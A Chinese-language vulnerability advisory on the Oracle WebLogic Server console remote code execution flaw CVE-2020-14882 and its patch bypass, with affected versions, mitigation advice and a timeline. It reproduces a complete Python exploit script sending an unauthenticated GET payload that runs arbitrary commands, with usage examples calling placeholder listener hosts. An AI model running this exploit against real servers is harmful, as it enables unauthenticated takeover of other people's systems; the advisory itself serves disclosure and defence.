【更新】CVE-2020-14882 | WebLogic远程代码执行漏洞通告

发布时间 2020-10-30

0x00 漏洞概述

CNVD   ID

CVE-2020-14882

时      间

2020-10-30

类     型

RCE

等      级

高危

远程利用

影响范围


 

WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。

 

0x01 漏洞详情

image.png

 

2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。

2020年10月29日, Oracle发布的漏洞补丁CVE-2020-14882存在可绕过的0day漏洞。即在Weblogic补丁更新完成后,攻击者仍可绕过WebLogic后台登录等限制,并控制Weblogic服务器。造成的风险和危害极大。漏洞详情如下:

漏洞编号

产品

组件

评分

影响范围

CVE-2020-14882

Oracle WebLogic Server

Console

9.8

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

CVE-2020-14883

Oracle WebLogic Server

Console

7.2

10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0,   14.1.1.0.0

 

相关EXP如下:

 

#!/usr/bin/python3

 

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request

# Exploit Author: Nguyen Jang

# CVE: CVE-2020-14882

# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html

# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

 

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

 

import requests

import sys

 

from urllib3.exceptions import InsecureRequestWarning

 

if len(sys.argv) != 3:

    print("[+] WebLogic Unauthenticated RCE via GET request")

    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")

    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")

    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")

    exit()

 

target = sys.argv[1]

command = sys.argv[2]

 

request = requests.session()

headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

 

print("[+] Sending GET Request ....")

 

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

 

print("[+] Done !!")

 

0x02 处置建议

临时措施:

由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。


0x03 参考链接

https://www.oracle.com/security-alerts/cpuoct2020.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html


0x04 时间线

2020-10-20  Oracle发布安全公告

2020-10-21  VSRC发布十月补丁更新安全通告

2020-10-28  漏洞POC被公开

2020-10-29  漏洞补丁被暴露存在绕过0day

2020-10-30  VSRC发布安全通告

 

0x05 附录

 

CVSS评分标准官网:http://www.first.org/cvss/

 

 

 

image.png